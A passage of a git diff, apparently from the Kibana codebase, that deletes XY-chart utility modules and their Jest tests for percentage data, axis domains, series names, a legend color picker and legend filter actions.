-export const isPercentileIdEqualToSeriesId = ( - columnId: number | string | null | undefined, - seriesColumnId: string -) => getSafeId(columnId) === seriesColumnId; - -export const isValidSeriesForDimension = (seriesColumnId: string, { aggId, accessor }: Aspect) => - (aggId === seriesColumnId || isPercentileIdEqualToSeriesId(aggId ?? '', seriesColumnId)) && - accessor !== null; diff --git a/src/plugins/vis_types/xy/public/utils/compute_percentage_data.test.ts b/src/plugins/vis_types/xy/public/utils/compute_percentage_data.test.ts deleted file mode 100644 index 0429bb5253b6f..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/compute_percentage_data.test.ts +++ /dev/null @@ -1,216 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { computePercentageData } from './compute_percentage_data'; - -const rowsOneMetric = [ - { - 'col-0-4': 'Kibana Airlines', - 'col-1-1': 85, - }, - { - 'col-0-4': 'ES-Air', - 'col-1-1': 84, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-1': 82, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-1': 81, - }, -]; - -const twoMetricsRows = [ - { - 'col-0-4': 'ES-Air', - 'col-1-5': 10, - 'col-2-1': 71, - 'col-3-1': 1, - }, - { - 'col-0-4': 'ES-Air', - 'col-1-5': 9, - 'col-2-1': 14, - 'col-3-1': 1, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 5, - 'col-2-1': 71, - 'col-3-1': 0, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 8, - 'col-2-1': 13, - 'col-3-1': 1, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 11, - 'col-2-1': 72, - 'col-3-1': 0, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 12, - 'col-2-1': 9, - 'col-3-1': 0, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-5': 5, - 'col-2-1': 71, - 'col-3-1': 1, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-5': 7, - 'col-2-1': 10, - 'col-3-1': 0, - }, -]; - -describe('computePercentageData', () => { - it('returns ratio 1 if there is only one metric in the axis', () => { - const data = computePercentageData(rowsOneMetric, 'col-0-4', ['col-1-1']); - expect(data).toStrictEqual([ - { - 'col-0-4': 'Kibana Airlines', - 'col-1-1': 1, - }, - { - 'col-0-4': 'ES-Air', - 'col-1-1': 1, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-1': 1, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-1': 1, - }, - ]); - }); - - it('returns correct ratio if there are two metrics in the same axis with no small multiples', () => { - const data = computePercentageData(twoMetricsRows, 'col-0-4', ['col-1-5', 'col-2-1']); - expect(data).toStrictEqual([ - { - 'col-0-4': 'ES-Air', - 'col-1-5': 0.09615384615384616, - 'col-2-1': 0.6826923076923077, - 'col-3-1': 1, - }, - { - 'col-0-4': 'ES-Air', - 'col-1-5': 0.08653846153846154, - 'col-2-1': 0.1346153846153846, - 'col-3-1': 1, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 0.05154639175257732, - 'col-2-1': 0.7319587628865979, - 'col-3-1': 0, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 0.08247422680412371, - 'col-2-1': 0.13402061855670103, - 'col-3-1': 1, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 0.10576923076923077, - 'col-2-1': 0.6923076923076923, - 'col-3-1': 0, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 0.11538461538461539, - 'col-2-1': 0.08653846153846154, - 'col-3-1': 0, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-5': 0.053763440860215055, - 'col-2-1': 0.7634408602150538, - 'col-3-1': 1, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-5': 0.07526881720430108, - 'col-2-1': 0.10752688172043011, - 'col-3-1': 0, - }, - ]); - }); - - it('returns correct ratio if there are two metrics in the same axis with small multiples', () => { - const data = computePercentageData( - twoMetricsRows, - 'col-0-4', - ['col-1-5', 'col-2-1'], - 'col-3-1' - ); - expect(data).toStrictEqual([ - { - 'col-0-4': 'ES-Air', - 'col-1-5': 0.09615384615384616, - 'col-2-1': 0.6826923076923077, - 'col-3-1': 1, - }, - { - 'col-0-4': 'ES-Air', - 'col-1-5': 0.08653846153846154, - 'col-2-1': 0.1346153846153846, - 'col-3-1': 1, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 0.06578947368421052, - 'col-2-1': 0.9342105263157895, - 'col-3-1': 0, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 0.38095238095238093, - 'col-2-1': 0.6190476190476191, - 'col-3-1': 1, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 0.10576923076923077, - 'col-2-1': 0.6923076923076923, - 'col-3-1': 0, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 0.11538461538461539, - 'col-2-1': 0.08653846153846154, - 'col-3-1': 0, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-5': 0.06578947368421052, - 'col-2-1': 0.9342105263157895, - 'col-3-1': 1, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-5': 0.4117647058823529, - 'col-2-1': 0.5882352941176471, - 'col-3-1': 0, - }, - ]); - }); -}); diff --git a/src/plugins/vis_types/xy/public/utils/compute_percentage_data.ts b/src/plugins/vis_types/xy/public/utils/compute_percentage_data.ts deleted file mode 100644 index 65b43495d8c6d..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/compute_percentage_data.ts +++ /dev/null @@ -1,31 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ -import type { Accessor, AccessorFn } from '@elastic/charts'; -import { computeRatioByGroups } from '@elastic/charts'; -import type { DatatableRow } from '@kbn/expressions-plugin/public'; - -export const computePercentageData = ( - rows: DatatableRow[], - xAccessor: Accessor | AccessorFn, - yAccessors: string[], - splitChartAccessor?: string | null -) => { - // compute percentage mode data - const groupAccessors = [String(xAccessor)]; - if (splitChartAccessor) { - groupAccessors.push(splitChartAccessor); - } - - return computeRatioByGroups( - rows, - groupAccessors, - yAccessors.map((accessor) => { - return [(d) => d[accessor], (d, v) => ({ ...d, [accessor]: v })]; - }) - ); -}; diff --git a/src/plugins/vis_types/xy/public/utils/domain.ts b/src/plugins/vis_types/xy/public/utils/domain.ts deleted file mode 100644 index 1f07509f55aa1..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/domain.ts +++ /dev/null @@ -1,84 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { uniq } from 'lodash'; -import { unitOfTime } from 'moment'; - -import { DomainRange } from '@elastic/charts'; - -import { getAdjustedInterval } from '@kbn/charts-plugin/public'; -import { Datatable } from '@kbn/expressions-plugin/public'; -import { DateHistogramParams, HistogramParams } from '@kbn/visualizations-plugin/public'; - -import { Aspect } from '../types'; - -export const getXDomain = (params: Aspect['params']): DomainRange => { - const minInterval = (params as DateHistogramParams | HistogramParams)?.interval ?? undefined; - const bounds = (params as DateHistogramParams).date - ? (params as DateHistogramParams).bounds - : null; - - if (bounds) { - return { - min: bounds.min as number, - max: bounds.max as number, - minInterval, - }; - } - - return { - minInterval, - min: NaN, - max: NaN, - }; -}; - -export const getAdjustedDomain = ( - data: Datatable['rows'], - { accessor, params }: Aspect, - timeZone: string, - domain: DomainRange | undefined, - hasBars?: boolean -): DomainRange => { - if ( - accessor && - domain && - 'min' in domain && - 'max' in domain && - 'intervalESValue' in params && - 'intervalESUnit' in params - ) { - const { interval, intervalESValue, intervalESUnit } = params; - const xValues = uniq(data.map((d) => d[accessor]).sort()); - - const [firstXValue] = xValues; - const lastXValue = xValues[xValues.length - 1]; - - const domainMin = Math.min(firstXValue, domain.min); - const domainMaxValue = Math.max(domain.max - interval, lastXValue); - const domainMax = hasBars ? domainMaxValue : domainMaxValue + interval; - const minInterval = getAdjustedInterval( - xValues, - intervalESValue, - intervalESUnit as unitOfTime.Base, - timeZone - ); - - return { - min: domainMin, - max: domainMax, - minInterval, - }; - } - - return { - minInterval: 'interval' in params ? params.interval : undefined, - min: NaN, - max: NaN, - }; -}; diff --git a/src/plugins/vis_types/xy/public/utils/get_all_series.test.ts b/src/plugins/vis_types/xy/public/utils/get_all_series.test.ts deleted file mode 100644 index 6c6b78dfd73f7..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/get_all_series.test.ts +++ /dev/null @@ -1,183 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { getAllSeries } from './get_all_series'; - -const rowsNoSplitSeries = [ - { - 'col-0-4': 'Kibana Airlines', - 'col-1-1': 85, - }, - { - 'col-0-4': 'ES-Air', - 'col-1-1': 84, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-1': 82, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-1': 81, - }, -]; - -const rowsWithSplitSeries = [ - { - 'col-0-4': 'ES-Air', - 'col-1-5': 0, - 'col-2-1': 71, - }, - { - 'col-0-4': 'ES-Air', - 'col-1-5': 1, - 'col-2-1': 14, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 0, - 'col-2-1': 71, - }, - { - 'col-0-4': 'Kibana Airlines', - 'col-1-5': 1, - 'col-2-1': 13, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 0, - 'col-2-1': 72, - }, - { - 'col-0-4': 'JetBeats', - 'col-1-5': 1, - 'col-2-1': 9, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-5': 0, - 'col-2-1': 71, - }, - { - 'col-0-4': 'Logstash Airways', - 'col-1-5': 1, - 'col-2-1': 10, - }, -]; - -const yAspects = [ - { - accessor: 'col-2-1', - column: 2, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, -]; - -const myltipleYAspects = [ - { - accessor: 'col-2-1', - column: 2, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, - { - accessor: 'col-3-4', - column: 3, - title: 'Average AvgTicketPrice', - format: { - id: 'number', - params: { - pattern: '$0,0.[00]', - }, - }, - aggType: 'avg', - aggId: '4', - params: {}, - }, -]; - -describe('getAllSeries', () => { - it('returns empty array if splitAccessors is undefined', () => { - const splitAccessors = undefined; - const series = getAllSeries(rowsNoSplitSeries, splitAccessors, yAspects); - expect(series).toStrictEqual([]); - }); - - it('returns an array of series names if splitAccessors is an array', () => { - const splitAccessors = [ - { - accessor: 'col-1-5', - }, - ]; - const series = getAllSeries(rowsWithSplitSeries, splitAccessors, yAspects); - expect(series).toStrictEqual([0, 1]); - }); - - it('returns the correct array of series names for two splitAccessors without duplicates', () => { - const splitAccessors = [ - { - accessor: 'col-0-4', - }, - { - accessor: 'col-1-5', - }, - ]; - const series = getAllSeries(rowsWithSplitSeries, splitAccessors, yAspects); - expect(series).toStrictEqual([ - 'ES-Air - 0', - 'ES-Air - 1', - 'Kibana Airlines - 0', - 'Kibana Airlines - 1', - 'JetBeats - 0', - 'JetBeats - 1', - 'Logstash Airways - 0', - 'Logstash Airways - 1', - ]); - }); - - it('returns the correct array of series names for two splitAccessors and two y axis', () => { - const splitAccessors = [ - { - accessor: 'col-0-4', - }, - { - accessor: 'col-1-5', - }, - ]; - const series = getAllSeries(rowsWithSplitSeries, splitAccessors, myltipleYAspects); - expect(series).toStrictEqual([ - 'ES-Air - 0: Count', - 'ES-Air - 0: Average AvgTicketPrice', - 'ES-Air - 1: Count', - 'ES-Air - 1: Average AvgTicketPrice', - 'Kibana Airlines - 0: Count', - 'Kibana Airlines - 0: Average AvgTicketPrice', - 'Kibana Airlines - 1: Count', - 'Kibana Airlines - 1: Average AvgTicketPrice', - 'JetBeats - 0: Count', - 'JetBeats - 0: Average AvgTicketPrice', - 'JetBeats - 1: Count', - 'JetBeats - 1: Average AvgTicketPrice', - 'Logstash Airways - 0: Count', - 'Logstash Airways - 0: Average AvgTicketPrice', - 'Logstash Airways - 1: Count', - 'Logstash Airways - 1: Average AvgTicketPrice', - ]); - }); -}); diff --git a/src/plugins/vis_types/xy/public/utils/get_all_series.ts b/src/plugins/vis_types/xy/public/utils/get_all_series.ts deleted file mode 100644 index 6ec625cb884c1..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/get_all_series.ts +++ /dev/null @@ -1,52 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { TickFormatter } from '@elastic/charts'; -import { DatatableRow } from '@kbn/expressions-plugin/public'; -import { Column, Aspect } from '../types'; - -interface SplitAccessors { - accessor: Column['id']; - formatter?: TickFormatter; -} - -export const getAllSeries = ( - rows: DatatableRow[], - splitAccessors: SplitAccessors[] | undefined, - yAspects: Aspect[] -) => { - const allSeries: string[] = []; - if (!splitAccessors) return []; - - rows.forEach((row) => { - let seriesName = ''; - splitAccessors?.forEach(({ accessor, formatter }) => { - if (!accessor) return; - const name = formatter ? formatter(row[accessor]) : row[accessor]; - if (seriesName) { - seriesName += ` - ${name}`; - } else { - seriesName = name; - } - }); - - // multiple y axis - if (yAspects.length > 1) { - yAspects.forEach((aspect) => { - if (!allSeries.includes(`${seriesName}: ${aspect.title}`)) { - allSeries.push(`${seriesName}: ${aspect.title}`); - } - }); - } else { - if (!allSeries.includes(seriesName)) { - allSeries.push(seriesName); - } - } - }); - return allSeries; -}; diff --git a/src/plugins/vis_types/xy/public/utils/get_color_picker.test.tsx b/src/plugins/vis_types/xy/public/utils/get_color_picker.test.tsx deleted file mode 100644 index 6c541fc27161e..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/get_color_picker.test.tsx +++ /dev/null @@ -1,98 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { LegendColorPickerProps, XYChartSeriesIdentifier } from '@elastic/charts'; -import { EuiPopover } from '@elastic/eui'; -import { mountWithIntl } from '@kbn/test-jest-helpers'; -import { ComponentType, ReactWrapper } from 'enzyme'; -import { getColorPicker } from './get_color_picker'; -import { ColorPicker } from '@kbn/charts-plugin/public'; -import type { PersistedState } from '@kbn/visualizations-plugin/public'; - -jest.mock('@elastic/charts', () => { - const original = jest.requireActual('@elastic/charts'); - - return { - ...original, - getSpecId: jest.fn(() => {}), - }; -}); - -describe('getColorPicker', function () { - const mockState = new Map(); - const uiState = { - get: jest - .fn() - .mockImplementation((key, fallback) => (mockState.has(key) ? mockState.get(key) : fallback)), - set: jest.fn().mockImplementation((key, value) => mockState.set(key, value)), - emit: jest.fn(), - setSilent: jest.fn(), - } as unknown as PersistedState; - - let wrapperProps: LegendColorPickerProps; - const Component: ComponentType = getColorPicker( - 'left', - jest.fn(), - jest.fn().mockImplementation((seriesIdentifier) => seriesIdentifier.seriesKeys[0]), - 'default', - uiState - ); - let wrapper: ReactWrapper; - - beforeAll(() => { - wrapperProps = { - color: 'rgb(109, 204, 177)', - onClose: jest.fn(), - onChange: jest.fn(), - anchor: document.createElement('div'), - seriesIdentifiers: [ - { - yAccessor: 'col-2-1', - splitAccessors: {}, - seriesKeys: ['Logstash Airways', 'col-2-1'], - specId: 'histogram-col-2-1', - key: 'groupId{__pseudo_stacked_group-ValueAxis-1__}spec{histogram-col-2-1}yAccessor{col-2-1}splitAccessors{col-1-3-Logstash Airways}', - } as XYChartSeriesIdentifier, - ], - }; - }); - - it('renders the color picker', () => { - wrapper = mountWithIntl(); - expect(wrapper.find(ColorPicker).length).toBe(1); - }); - - it('renders the color picker with the colorIsOverwritten prop set to false if color is not overwritten for the specific series', () => { - wrapper = mountWithIntl(); - expect(wrapper.find(ColorPicker).prop('colorIsOverwritten')).toBe(false); - }); - - it('renders the color picker with the colorIsOverwritten prop set to true if color is overwritten for the specific series', () => { - uiState.set('vis.colors', { 'Logstash Airways': '#6092c0' }); - wrapper = mountWithIntl(); - expect(wrapper.find(ColorPicker).prop('colorIsOverwritten')).toBe(true); - }); - - it('renders the picker on the correct position', () => { - wrapper = mountWithIntl(); - expect(wrapper.find(EuiPopover).prop('anchorPosition')).toEqual('rightCenter'); - }); - - it('renders the picker for kibana palette with useLegacyColors set to true', () => { - const LegacyPaletteComponent: ComponentType = getColorPicker( - 'left', - jest.fn(), - jest.fn(), - 'kibana_palette', - uiState - ); - wrapper = mountWithIntl(); - expect(wrapper.find(ColorPicker).prop('useLegacyColors')).toBe(true); - }); -}); diff --git a/src/plugins/vis_types/xy/public/utils/get_color_picker.tsx b/src/plugins/vis_types/xy/public/utils/get_color_picker.tsx deleted file mode 100644 index 18ba4296e2545..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/get_color_picker.tsx +++ /dev/null @@ -1,92 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { useCallback } from 'react'; - -import { LegendColorPicker, Position, XYChartSeriesIdentifier, SeriesName } from '@elastic/charts'; -import { PopoverAnchorPosition, EuiWrappingPopover, EuiOutsideClickDetector } from '@elastic/eui'; -import type { PersistedState } from '@kbn/visualizations-plugin/public'; -import { ColorPicker } from '@kbn/charts-plugin/public'; - -function getAnchorPosition(legendPosition: Position): PopoverAnchorPosition { - switch (legendPosition) { - case Position.Bottom: - return 'upCenter'; - case Position.Top: - return 'downCenter'; - case Position.Left: - return 'rightCenter'; - default: - return 'leftCenter'; - } -} - -const KEY_CODE_ENTER = 13; - -export const getColorPicker = - ( - legendPosition: Position, - setColor: (newColor: string | null, seriesKey: string | number) => void, - getSeriesName: (series: XYChartSeriesIdentifier) => SeriesName, - paletteName: string, - uiState: PersistedState - ): LegendColorPicker => - ({ anchor, color, onClose, onChange, seriesIdentifiers: [seriesIdentifier] }) => { - const seriesName = getSeriesName(seriesIdentifier as XYChartSeriesIdentifier); - const overwriteColors: Record = uiState?.get('vis.colors', {}); - const colorIsOverwritten = Object.keys(overwriteColors).includes(seriesName as string); - let keyDownEventOn = false; - - const handleChange = (newColor: string | null) => { - if (!seriesName) { - return; - } - if (newColor) { - onChange(newColor); - } - setColor(newColor, seriesName); - // close the popover if no color is applied or the user has clicked a color - if (!newColor || !keyDownEventOn) { - onClose(); - } - }; - - const onKeyDown = (e: React.KeyboardEvent) => { - if (e.keyCode === KEY_CODE_ENTER) { - onClose?.(); - } - keyDownEventOn = true; - }; - - const handleOutsideClick = useCallback(() => { - onClose?.(); - }, [onClose]); - - return ( - - - - - - ); - }; diff --git a/src/plugins/vis_types/xy/public/utils/get_legend_actions.tsx b/src/plugins/vis_types/xy/public/utils/get_legend_actions.tsx deleted file mode 100644 index 3d79b607c4da1..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/get_legend_actions.tsx +++ /dev/null @@ -1,116 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { useState, useEffect, useMemo } from 'react'; - -import { i18n } from '@kbn/i18n'; -import { EuiContextMenuPanelDescriptor, EuiIcon, EuiPopover, EuiContextMenu } from '@elastic/eui'; -import { - LegendAction, - XYChartSeriesIdentifier, - SeriesName, - useLegendAction, -} from '@elastic/charts'; - -import { ClickTriggerEvent } from '@kbn/charts-plugin/public'; - -export const getLegendActions = ( - canFilter: (data: ClickTriggerEvent | null) => Promise, - getFilterEventData: (series: XYChartSeriesIdentifier) => ClickTriggerEvent | null, - onFilter: (data: ClickTriggerEvent, negate?: any) => void, - getSeriesName: (series: XYChartSeriesIdentifier) => SeriesName -): LegendAction => { - return ({ series: [xySeries] }) => { - const [popoverOpen, setPopoverOpen] = useState(false); - const [isfilterable, setIsfilterable] = useState(false); - const series = xySeries as XYChartSeriesIdentifier; - const filterData = useMemo(() => getFilterEventData(series), [series]); - const [ref, onClose] = useLegendAction(); - - useEffect(() => { - (async () => setIsfilterable(await canFilter(filterData)))(); - }, [filterData]); - - if (!isfilterable || !filterData) { - return null; - } - - const name = getSeriesName(series); - const panels: EuiContextMenuPanelDescriptor[] = [ - { - id: 'main', - title: `${name}`, - items: [ - { - name: i18n.translate('visTypeXy.legend.filterForValueButtonAriaLabel', { - defaultMessage: 'Filter for value', - }), - 'data-test-subj': `legend-${name}-filterIn`, - icon: , - onClick: () => { - setPopoverOpen(false); - onFilter(filterData); - }, - }, - { - name: i18n.translate('visTypeXy.legend.filterOutValueButtonAriaLabel', { - defaultMessage: 'Filter out value', - }), - 'data-test-subj': `legend-${name}-filterOut`, - icon: , - onClick: () => { - setPopoverOpen(false); - onFilter(filterData, true); - }, - }, - ], - }, - ]; - - const Button = ( -
setPopoverOpen(!popoverOpen)} - onClick={() => setPopoverOpen(!popoverOpen)} - > - -
- ); - - return ( - { - setPopoverOpen(false); - onClose(); - }} - panelPaddingSize="none" - anchorPosition="upLeft" - title={i18n.translate('visTypeXy.legend.filterOptionsLegend', { - defaultMessage: '{legendDataLabel}, filter options', - values: { legendDataLabel: name }, - })} - > - - - ); - }; -}; diff --git a/src/plugins/vis_types/xy/public/utils/get_series_name_fn.test.ts b/src/plugins/vis_types/xy/public/utils/get_series_name_fn.test.ts deleted file mode 100644 index 88be9ab160896..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/get_series_name_fn.test.ts +++ /dev/null @@ -1,145 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { XYChartSeriesIdentifier } from '@elastic/charts'; -import { getSeriesNameFn } from './get_series_name_fn'; - -const aspects = { - series: [ - { - accessor: 'col-1-3', - column: 1, - title: 'FlightDelayType: Descending', - format: { - id: 'terms', - params: { - id: 'string', - otherBucketLabel: 'Other', - missingBucketLabel: 'Missing', - }, - }, - aggType: 'terms', - aggId: '3', - params: {}, - }, - ], - x: { - accessor: 'col-0-2', - column: 0, - title: 'timestamp per day', - format: { - id: 'date', - params: { - pattern: 'YYYY-MM-DD', - }, - }, - aggType: 'date_histogram', - aggId: '2', - params: { - date: true, - intervalESUnit: 'd', - intervalESValue: 1, - interval: 86400000, - format: 'YYYY-MM-DD', - }, - }, - y: [ - { - accessor: 'col-1-1', - column: 1, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, - ], -}; - -const series = { - specId: 'histogram-col-1-1', - seriesKeys: ['col-1-1'], - yAccessor: 'col-1-1', - splitAccessors: [], - smVerticalAccessorValue: '__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__', - smHorizontalAccessorValue: '__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__', - groupId: '__pseudo_stacked_group-ValueAxis-1__', - seriesType: 'bar', - isStacked: true, -} as unknown as XYChartSeriesIdentifier; - -const splitAccessors = new Map(); -splitAccessors.set('col-1-3', 'Weather Delay'); - -const seriesSplitAccessors = { - specId: 'histogram-col-2-1', - seriesKeys: ['Weather Delay', 'col-2-1'], - yAccessor: 'col-2-1', - splitAccessors, - smVerticalAccessorValue: '__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__', - smHorizontalAccessorValue: '__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__', - groupId: '__pseudo_stacked_group-ValueAxis-1__', - seriesType: 'bar', - isStacked: true, -} as unknown as XYChartSeriesIdentifier; - -describe('getSeriesNameFn', () => { - it('returns the y aspects title if splitAccessors are empty array', () => { - const getSeriesName = getSeriesNameFn(aspects, false); - expect(getSeriesName(series)).toStrictEqual('Count'); - }); - - it('returns the y aspects title if splitAccessors are empty array but mupliple flag is set to true', () => { - const getSeriesName = getSeriesNameFn(aspects, true); - expect(getSeriesName(series)).toStrictEqual('Count'); - }); - - it('returns the correct string for multiple set to false and given split accessors', () => { - const aspectsSplitSeries = { - ...aspects, - y: [ - { - accessor: 'col-2-1', - column: 2, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, - ], - }; - const getSeriesName = getSeriesNameFn(aspectsSplitSeries, false); - expect(getSeriesName(seriesSplitAccessors)).toStrictEqual('Weather Delay'); - }); - - it('returns the correct string for multiple set to true and given split accessors', () => { - const aspectsSplitSeries = { - ...aspects, - y: [ - { - accessor: 'col-2-1', - column: 2, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, - ], - }; - const getSeriesName = getSeriesNameFn(aspectsSplitSeries, true); - expect(getSeriesName(seriesSplitAccessors)).toStrictEqual('Weather Delay: Count'); - }); -}); diff --git a/src/plugins/vis_types/xy/public/utils/get_series_name_fn.ts b/src/plugins/vis_types/xy/public/utils/get_series_name_fn.ts deleted file mode 100644 index 8019e36c1e6d5..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/get_series_name_fn.ts +++ /dev/null @@ -1,48 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { memoize } from 'lodash'; - -import { XYChartSeriesIdentifier, SeriesName } from '@elastic/charts'; - -import { VisConfig } from '../types'; - -function getSplitValues( - splitAccessors: XYChartSeriesIdentifier['splitAccessors'], - seriesAspects?: VisConfig['aspects']['series'] -) { - if (splitAccessors.size < 1) { - return []; - } - - const splitValues: Array = []; - splitAccessors.forEach((value, key) => { - const split = (seriesAspects ?? []).find(({ accessor }) => accessor === key); - splitValues.push(split?.formatter ? split?.formatter(value) : value); - }); - return splitValues; -} - -export const getSeriesNameFn = (aspects: VisConfig['aspects'], multipleY = false) => - memoize(({ splitAccessors, yAccessor }: XYChartSeriesIdentifier): SeriesName => { - const splitValues = getSplitValues(splitAccessors, aspects.series); - const yAccessorTitle = aspects.y.find(({ accessor }) => accessor === yAccessor)?.title ?? null; - - if (!yAccessorTitle) { - return null; - } - - if (multipleY) { - if (splitValues.length === 0) { - return yAccessorTitle; - } - return `${splitValues.join(' - ')}: ${yAccessorTitle}`; - } - - return splitValues.length > 0 ? splitValues.join(' - ') : yAccessorTitle; - }); diff --git a/src/plugins/vis_types/xy/public/utils/get_series_params.test.ts b/src/plugins/vis_types/xy/public/utils/get_series_params.test.ts deleted file mode 100644 index 21b2dac5da322..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/get_series_params.test.ts +++ /dev/null @@ -1,64 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ -import type { AggConfigs } from '@kbn/data-plugin/public'; -import type { SeriesParam } from '../types'; -import { getSeriesParams } from './get_series_params'; -import { sampleAreaVis } from '../sample_vis.test.mocks'; - -describe('getSeriesParams', () => { - it('returns correct params', () => { - const seriesParams = getSeriesParams( - sampleAreaVis.data.aggs as unknown as AggConfigs, - sampleAreaVis.params.seriesParams as unknown as SeriesParam[], - 'metric', - 'ValueAxis-1' - ); - expect(seriesParams).toStrictEqual([ - { - circlesRadius: 5, - data: { - id: '1', - label: 'Total quantity', - }, - drawLinesBetweenPoints: true, - interpolate: 'linear', - mode: 'stacked', - show: 'true', - showCircles: true, - type: 'area', - valueAxis: 'ValueAxis-1', - }, - ]); - }); - - it('returns default params if no params provided', () => { - const seriesParams = getSeriesParams( - sampleAreaVis.data.aggs as unknown as AggConfigs, - [], - 'metric', - 'ValueAxis-1' - ); - expect(seriesParams).toStrictEqual([ - { - circlesRadius: 1, - data: { - id: '1', - label: 'Total quantity', - }, - drawLinesBetweenPoints: true, - interpolate: 'linear', - lineWidth: 2, - mode: 'normal', - show: true, - showCircles: true, - type: 'line', - valueAxis: 'ValueAxis-1', - }, - ]); - }); -}); diff --git a/src/plugins/vis_types/xy/public/utils/get_time_zone.tsx b/src/plugins/vis_types/xy/public/utils/get_time_zone.tsx deleted file mode 100644 index 2d63eebbdc3e2..0000000000000 --- a/src/plugins/vis_types/xy/public/utils/get_time_zone.tsx +++ /dev/null @@ -1,25 